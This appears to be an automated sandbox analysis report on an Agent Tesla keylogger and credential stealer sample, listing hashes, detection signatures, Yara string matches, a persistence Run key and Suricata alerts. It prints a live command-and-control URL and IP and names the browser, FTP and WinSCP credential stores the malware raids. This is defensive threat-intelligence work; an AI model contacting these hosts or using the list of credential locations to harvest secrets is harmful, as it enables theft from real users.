Edit tour

Windows Analysis Report
ZOYGRL1ePa.exe

Overview

General Information

Sample name:	ZOYGRL1ePa.exe renamed because original name is a hash value
Original sample name:	5EAF2ADBF1AEABB924D54C7AEAFA40FB.exe
Analysis ID:	1582107
MD5:	5eaf2adbf1aeabb924d54c7aeafa40fb
SHA1:	5b54fed08222c7aeed799da6711c307ab3a94ea6
SHA256:	54a813d8f2aab7d1e76d8577784ccd9350c025e52f656fee6a228d39dfbac926
Tags:	AgentTeslaexeuser-abuse_ch
Infos:

Detection

Agent Tesla, AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Agent Tesla keylogger

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to capture screen (.Net source)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Moves itself to temp directory

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

ZOYGRL1ePa.exe (PID: 6972 cmdline: "C:\Users\user\Desktop\ZOYGRL1ePa.exe" MD5: 5EAF2ADBF1AEABB924D54C7AEAFA40FB)

CTF Loader.exe (PID: 2756 cmdline: "C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe" MD5: 5EAF2ADBF1AEABB924D54C7AEAFA40FB)

CTF Loader.exe (PID: 3716 cmdline: "C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe" MD5: 5EAF2ADBF1AEABB924D54C7AEAFA40FB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Web Panel", "C2 url": "http://eygds.info/api.php"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
ZOYGRL1ePa.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
ZOYGRL1ePa.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
ZOYGRL1ePa.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
ZOYGRL1ePa.exe	AgentTesla_1	AgentTesla Payload	kevoreilly	0x25794:$string1: smtp 0x26ed4:$string1: smtp 0x24d66:$string2: appdata 0x24e6a:$string3: 76487-337-8429955-22614 0x24db6:$string4: yyyy-MM-dd HH:mm:ss 0x24d48:$string6: webpanel 0x2593d:$string7: <br>UserName      : 0x25ef1:$string8: <br>IP Address  :
ZOYGRL1ePa.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2992d:$f1: FileZilla\recentservers.xml 0x29a39:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28df1:$b1: Chrome\User Data\ 0x18130:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1840c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28e69:$b4: Opera Software\Opera Stable\Login Data 0x28ed1:$b5: YandexBrowser\User Data\ 0x1bbd8:$s4: logins.json 0x28f45:$s4: logins.json 0x2a4cb:$s5: Account.CFN 0x2ac03:$s6: wand.dat 0x28da5:$a1: username_value 0x28dc3:$a2: password_value 0x1bc2c:$a3: encryptedUsername 0x28f99:$a3: encryptedUsername 0x29613:$a3: encryptedUsername 0x1bc08:$a4: encryptedPassword 0x28f75:$a4: encryptedPassword 0x29637:$a4: encryptedPassword
ZOYGRL1ePa.exe	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22bb8:$s1: get_kbHook 0x23ef1:$s2: GetPrivateProfileString 0x21df4:$s3: get_OSFullName 0x22e6c:$s4: get_PasswordHash 0x225db:$s6: FtpWebRequest 0x1bbd8:$s7: logins 0x28e5b:$s7: logins 0x28f45:$s7: logins 0x293f3:$s7: logins 0x295f3:$s7: logins 0x2c6c7:$s7: logins 0x25e73:$s8: keylog
ZOYGRL1ePa.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bbd8:$s10: logins 0x28e5b:$s10: logins 0x28f45:$s10: logins 0x293f3:$s10: logins 0x295f3:$s10: logins 0x2c6c7:$s10: logins 0x22b89:$g1: get_Clipboard 0x22d30:$g2: get_Keyboard 0x17544:$g3: get_Password 0x1afc5:$g3: get_Password 0x22e7d:$g3: get_Password 0x22d55:$g4: get_CtrlKeyDown 0x22d77:$g5: get_ShiftKeyDown 0x22d46:$g6: get_AltKeyDown
Click to see the 2 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	AgentTesla_1	AgentTesla Payload	kevoreilly	0x25794:$string1: smtp 0x26ed4:$string1: smtp 0x24d66:$string2: appdata 0x24e6a:$string3: 76487-337-8429955-22614 0x24db6:$string4: yyyy-MM-dd HH:mm:ss 0x24d48:$string6: webpanel 0x2593d:$string7: <br>UserName      : 0x25ef1:$string8: <br>IP Address  :
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2992d:$f1: FileZilla\recentservers.xml 0x29a39:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28df1:$b1: Chrome\User Data\ 0x18130:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1840c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28e69:$b4: Opera Software\Opera Stable\Login Data 0x28ed1:$b5: YandexBrowser\User Data\ 0x1bbd8:$s4: logins.json 0x28f45:$s4: logins.json 0x2a4cb:$s5: Account.CFN 0x2ac03:$s6: wand.dat 0x28da5:$a1: username_value 0x28dc3:$a2: password_value 0x1bc2c:$a3: encryptedUsername 0x28f99:$a3: encryptedUsername 0x29613:$a3: encryptedUsername 0x1bc08:$a4: encryptedPassword 0x28f75:$a4: encryptedPassword 0x29637:$a4: encryptedPassword
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22bb8:$s1: get_kbHook 0x23ef1:$s2: GetPrivateProfileString 0x21df4:$s3: get_OSFullName 0x22e6c:$s4: get_PasswordHash 0x225db:$s6: FtpWebRequest 0x1bbd8:$s7: logins 0x28e5b:$s7: logins 0x28f45:$s7: logins 0x293f3:$s7: logins 0x295f3:$s7: logins 0x2c6c7:$s7: logins 0x25e73:$s8: keylog
C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bbd8:$s10: logins 0x28e5b:$s10: logins 0x28f45:$s10: logins 0x293f3:$s10: logins 0x295f3:$s10: logins 0x2c6c7:$s10: logins 0x22b89:$g1: get_Clipboard 0x22d30:$g2: get_Keyboard 0x17544:$g3: get_Password 0x1afc5:$g3: get_Password 0x22e7d:$g3: get_Password 0x22d55:$g4: get_CtrlKeyDown 0x22d77:$g5: get_ShiftKeyDown 0x22d46:$g6: get_AltKeyDown
Click to see the 2 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000000.1649850633.0000000000B22000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.4113755597.0000000002F00000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4113829558.0000000002738000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.4113829558.0000000002600000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.4113755597.0000000003027000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ZOYGRL1ePa.exe PID: 6972	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ZOYGRL1ePa.exe PID: 6972	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: ZOYGRL1ePa.exe PID: 6972	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: ZOYGRL1ePa.exe PID: 6972	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: ZOYGRL1ePa.exe PID: 6972	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x32ac:$a: type={ 0x233c2:$a: type={ 0x23a7c:$a: type={ 0x22f36e:$a: type={ 0x32b6:$b: hwid={ 0x233cc:$b: hwid={ 0x22f378:$b: hwid={ 0x32c0:$c: time={ 0x233d6:$c: time={ 0x22f382:$c: time={ 0x32ca:$d: pcname={ 0x233e0:$d: pcname={ 0x22f38c:$d: pcname={ 0x32d6:$e: logdata={ 0x233ec:$e: logdata={ 0x22f398:$e: logdata={ 0x32e3:$f: screen={ 0x233f9:$f: screen={ 0x22f3a5:$f: screen={ 0x32ef:$g: ipadd={ 0x23405:$g: ipadd={
Process Memory Space: CTF Loader.exe PID: 2756	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CTF Loader.exe PID: 2756	JoeSecurity_Agenttesla_Smtp_Variant	Yara detected AgentTesla	Joe Security
Process Memory Space: CTF Loader.exe PID: 2756	agenttesla_smtp_variant	unknown	j from thl <j@techhelplist.com> with thx to @fumik0_ !!1!	0x22beaa:$a: type={ 0x24b64b:$a: type={ 0x22beb4:$b: hwid={ 0x24b655:$b: hwid={ 0x22bebe:$c: time={ 0x24b65f:$c: time={ 0x22bec8:$d: pcname={ 0x24b669:$d: pcname={ 0x22bed4:$e: logdata={ 0x24b675:$e: logdata={ 0x22bee1:$f: screen={ 0x24b682:$f: screen={ 0x22beed:$g: ipadd={ 0x24b68e:$g: ipadd={ 0x22bef8:$h: webcam_link={ 0x24b699:$h: webcam_link={ 0x22bf09:$i: screen_link={ 0x24b6de:$i: screen_link={ 0x22bf1a:$j: site_username={ 0x24b6f0:$j: site_username={ 0xc62d:$k: [passwords]
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x1090c:$string1: smtp 0x1204c:$string1: smtp 0xfede:$string2: appdata 0xffe2:$string3: 76487-337-8429955-22614 0xff2e:$string4: yyyy-MM-dd HH:mm:ss 0xfec0:$string6: webpanel 0x10ab5:$string7: <br>UserName      : 0x11069:$string8: <br>IP Address  :
0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x14aa5:$f1: FileZilla\recentservers.xml 0x14bb1:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x13f69:$b1: Chrome\User Data\ 0x32a8:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x3584:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x13fe1:$b4: Opera Software\Opera Stable\Login Data 0x14049:$b5: YandexBrowser\User Data\ 0x6d50:$s4: logins.json 0x140bd:$s4: logins.json 0x15643:$s5: Account.CFN 0x15d7b:$s6: wand.dat 0x13f1d:$a1: username_value 0x13f3b:$a2: password_value 0x6da4:$a3: encryptedUsername 0x14111:$a3: encryptedUsername 0x1478b:$a3: encryptedUsername 0x6d80:$a4: encryptedPassword 0x140ed:$a4: encryptedPassword 0x147af:$a4: encryptedPassword
0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0xdd30:$s1: get_kbHook 0xf069:$s2: GetPrivateProfileString 0xcf6c:$s3: get_OSFullName 0xdfe4:$s4: get_PasswordHash 0xd753:$s6: FtpWebRequest 0x6d50:$s7: logins 0x13fd3:$s7: logins 0x140bd:$s7: logins 0x1456b:$s7: logins 0x1476b:$s7: logins 0x1783f:$s7: logins 0x10feb:$s8: keylog
0.0.ZOYGRL1ePa.exe.b36c88.2.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x6d50:$s10: logins 0x13fd3:$s10: logins 0x140bd:$s10: logins 0x1456b:$s10: logins 0x1476b:$s10: logins 0x1783f:$s10: logins 0xdd01:$g1: get_Clipboard 0xdea8:$g2: get_Keyboard 0x26bc:$g3: get_Password 0x613d:$g3: get_Password 0xdff5:$g3: get_Password 0xdecd:$g4: get_CtrlKeyDown 0xdeef:$g5: get_ShiftKeyDown 0xdebe:$g6: get_AltKeyDown
0.0.ZOYGRL1ePa.exe.b20000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.ZOYGRL1ePa.exe.b20000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.ZOYGRL1ePa.exe.b20000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.ZOYGRL1ePa.exe.b20000.0.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0x25794:$string1: smtp 0x26ed4:$string1: smtp 0x24d66:$string2: appdata 0x24e6a:$string3: 76487-337-8429955-22614 0x24db6:$string4: yyyy-MM-dd HH:mm:ss 0x24d48:$string6: webpanel 0x2593d:$string7: <br>UserName      : 0x25ef1:$string8: <br>IP Address  :
0.0.ZOYGRL1ePa.exe.b20000.0.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x2992d:$f1: FileZilla\recentservers.xml 0x29a39:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0x28df1:$b1: Chrome\User Data\ 0x18130:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x1840c:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x28e69:$b4: Opera Software\Opera Stable\Login Data 0x28ed1:$b5: YandexBrowser\User Data\ 0x1bbd8:$s4: logins.json 0x28f45:$s4: logins.json 0x2a4cb:$s5: Account.CFN 0x2ac03:$s6: wand.dat 0x28da5:$a1: username_value 0x28dc3:$a2: password_value 0x1bc2c:$a3: encryptedUsername 0x28f99:$a3: encryptedUsername 0x29613:$a3: encryptedUsername 0x1bc08:$a4: encryptedPassword 0x28f75:$a4: encryptedPassword 0x29637:$a4: encryptedPassword
0.0.ZOYGRL1ePa.exe.b20000.0.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x22bb8:$s1: get_kbHook 0x23ef1:$s2: GetPrivateProfileString 0x21df4:$s3: get_OSFullName 0x22e6c:$s4: get_PasswordHash 0x225db:$s6: FtpWebRequest 0x1bbd8:$s7: logins 0x28e5b:$s7: logins 0x28f45:$s7: logins 0x293f3:$s7: logins 0x295f3:$s7: logins 0x2c6c7:$s7: logins 0x25e73:$s8: keylog
0.0.ZOYGRL1ePa.exe.b20000.0.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x1bbd8:$s10: logins 0x28e5b:$s10: logins 0x28f45:$s10: logins 0x293f3:$s10: logins 0x295f3:$s10: logins 0x2c6c7:$s10: logins 0x22b89:$g1: get_Clipboard 0x22d30:$g2: get_Keyboard 0x17544:$g3: get_Password 0x1afc5:$g3: get_Password 0x22e7d:$g3: get_Password 0x22d55:$g4: get_CtrlKeyDown 0x22d77:$g5: get_ShiftKeyDown 0x22d46:$g6: get_AltKeyDown
0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack	AgentTesla_1	AgentTesla Payload	kevoreilly	0xc630:$string1: smtp 0xdd70:$string1: smtp 0xbc02:$string2: appdata 0xbd06:$string3: 76487-337-8429955-22614 0xbc52:$string4: yyyy-MM-dd HH:mm:ss 0xbbe4:$string6: webpanel 0xc7d9:$string7: <br>UserName      : 0xcd8d:$string8: <br>IP Address  :
0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x107c9:$f1: FileZilla\recentservers.xml 0x108d5:$f3: SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions 0xfc8d:$b1: Chrome\User Data\ 0xfd05:$b4: Opera Software\Opera Stable\Login Data 0xfd6d:$b5: YandexBrowser\User Data\ 0x2a74:$s4: logins.json 0xfde1:$s4: logins.json 0x11367:$s5: Account.CFN 0x11a9f:$s6: wand.dat 0xfc41:$a1: username_value 0xfc5f:$a2: password_value 0x2ac8:$a3: encryptedUsername 0xfe35:$a3: encryptedUsername 0x104af:$a3: encryptedUsername 0x2aa4:$a4: encryptedPassword 0xfe11:$a4: encryptedPassword 0x104d3:$a4: encryptedPassword
0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack	MALWARE_Win_AgentTeslaV2	AgenetTesla Type 2 Keylogger payload	ditekSHen	0x9a54:$s1: get_kbHook 0xad8d:$s2: GetPrivateProfileString 0x8c90:$s3: get_OSFullName 0x9d08:$s4: get_PasswordHash 0x9477:$s6: FtpWebRequest 0x2a74:$s7: logins 0xfcf7:$s7: logins 0xfde1:$s7: logins 0x1028f:$s7: logins 0x1048f:$s7: logins 0x13563:$s7: logins 0xcd0f:$s8: keylog
0.0.ZOYGRL1ePa.exe.b3af64.1.raw.unpack	MALWARE_Win_AgentTeslaV3	AgentTeslaV3 infostealer payload	ditekSHen	0x2a74:$s10: logins 0xfcf7:$s10: logins 0xfde1:$s10: logins 0x1028f:$s10: logins 0x1048f:$s10: logins 0x13563:$s10: logins 0x9a25:$g1: get_Clipboard 0x9bcc:$g2: get_Keyboard 0x1e61:$g3: get_Password 0x9d19:$g3: get_Password 0x9bf1:$g4: get_CtrlKeyDown 0x9c13:$g5: get_ShiftKeyDown 0x9be2:$g6: get_AltKeyDown
4.2.CTF Loader.exe.274007c.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.ZOYGRL1ePa.exe.3053af8.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\CTF Loader\CTF Loader.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\ZOYGRL1ePa.exe, ProcessId: 6972, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyOtApp

Suricata Signatures

ET MALWARE AgentTesla Communicating with CnC Server

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T01:57:11.650199+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49731	156.67.74.96	80	TCP
2024-12-30T01:57:12.441504+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49732	156.67.74.96	80	TCP
2024-12-30T01:57:13.327024+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49734	156.67.74.96	80	TCP
2024-12-30T01:57:40.931828+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49742	156.67.74.96	80	TCP
2024-12-30T01:57:51.883896+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49743	156.67.74.96	80	TCP
2024-12-30T01:58:12.391965+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49849	156.67.74.96	80	TCP
2024-12-30T01:58:12.425837+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49850	156.67.74.96	80	TCP
2024-12-30T01:58:22.816029+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49921	156.67.74.96	80	TCP
2024-12-30T01:58:22.829424+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49920	156.67.74.96	80	TCP
2024-12-30T01:58:29.869471+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49972	156.67.74.96	80	TCP
2024-12-30T01:58:29.877609+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	49973	156.67.74.96	80	TCP
2024-12-30T01:58:33.725951+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50002	156.67.74.96	80	TCP
2024-12-30T01:58:33.765816+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50001	156.67.74.96	80	TCP
2024-12-30T01:58:35.305946+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50013	156.67.74.96	80	TCP
2024-12-30T01:58:37.236687+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50023	156.67.74.96	80	TCP
2024-12-30T01:58:41.679275+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50024	156.67.74.96	80	TCP
2024-12-30T01:58:57.213235+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50027	156.67.74.96	80	TCP
2024-12-30T01:58:57.215163+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50026	156.67.74.96	80	TCP
2024-12-30T01:59:23.447298+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50030	156.67.74.96	80	TCP
2024-12-30T01:59:23.458418+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50029	156.67.74.96	80	TCP
2024-12-30T01:59:46.836077+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50032	156.67.74.96	80	TCP
2024-12-30T01:59:46.856659+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50033	156.67.74.96	80	TCP
2024-12-30T01:59:50.164596+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50035	156.67.74.96	80	TCP
2024-12-30T01:59:50.167784+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50034	156.67.74.96	80	TCP
2024-12-30T01:59:50.800142+0100	2034579	1	Malware Command and Control Activity Detected	192.168.2.4	50036	156.67.74.96	80	TCP

ETPRO MALWARE AgentTesla Communicating with CnC Server M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-30T01:57:11.475157+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49731	156.67.74.96	80	TCP
2024-12-30T01:57:11.814263+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49731	156.67.74.96	80	TCP
2024-12-30T01:57:12.209456+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49732	156.67.74.96	80	TCP
2024-12-30T01:57:13.134175+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49734	156.67.74.96	80	TCP
2024-12-30T01:57:40.725095+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49742	156.67.74.96	80	TCP
2024-12-30T01:57:41.092760+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49742	156.67.74.96	80	TCP
2024-12-30T01:57:51.662633+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49743	156.67.74.96	80	TCP
2024-12-30T01:58:12.193806+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49849	156.67.74.96	80	TCP
2024-12-30T01:58:12.209416+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49850	156.67.74.96	80	TCP
2024-12-30T01:58:12.542245+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49849	156.67.74.96	80	TCP
2024-12-30T01:58:22.615628+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49920	156.67.74.96	80	TCP
2024-12-30T01:58:22.615632+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49921	156.67.74.96	80	TCP
2024-12-30T01:58:22.693833+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49922	156.67.74.96	80	TCP
2024-12-30T01:58:26.848396+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49953	156.67.74.96	80	TCP
2024-12-30T01:58:26.848398+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49952	156.67.74.96	80	TCP
2024-12-30T01:58:27.209742+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49955	156.67.74.96	80	TCP
2024-12-30T01:58:29.678187+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49973	156.67.74.96	80	TCP
2024-12-30T01:58:29.678196+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49972	156.67.74.96	80	TCP
2024-12-30T01:58:30.028952+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	49973	156.67.74.96	80	TCP
2024-12-30T01:58:33.537533+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50002	156.67.74.96	80	TCP
2024-12-30T01:58:33.537622+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50001	156.67.74.96	80	TCP
2024-12-30T01:58:33.935018+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50001	156.67.74.96	80	TCP
2024-12-30T01:58:35.115585+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50013	156.67.74.96	80	TCP
2024-12-30T01:58:37.045008+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50023	156.67.74.96	80	TCP
2024-12-30T01:58:37.394781+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50023	156.67.74.96	80	TCP
2024-12-30T01:58:41.475423+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50024	156.67.74.96	80	TCP
2024-12-30T01:58:41.615740+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50025	156.67.74.96	80	TCP
2024-12-30T01:58:56.912481+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50026	156.67.74.96	80	TCP
2024-12-30T01:58:56.912527+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50027	156.67.74.96	80	TCP
2024-12-30T01:58:57.084437+0100	2831192	1	Malware Command and Control Activity Detected	192.168.2.4	50028	156.67.74.96	80	TCP
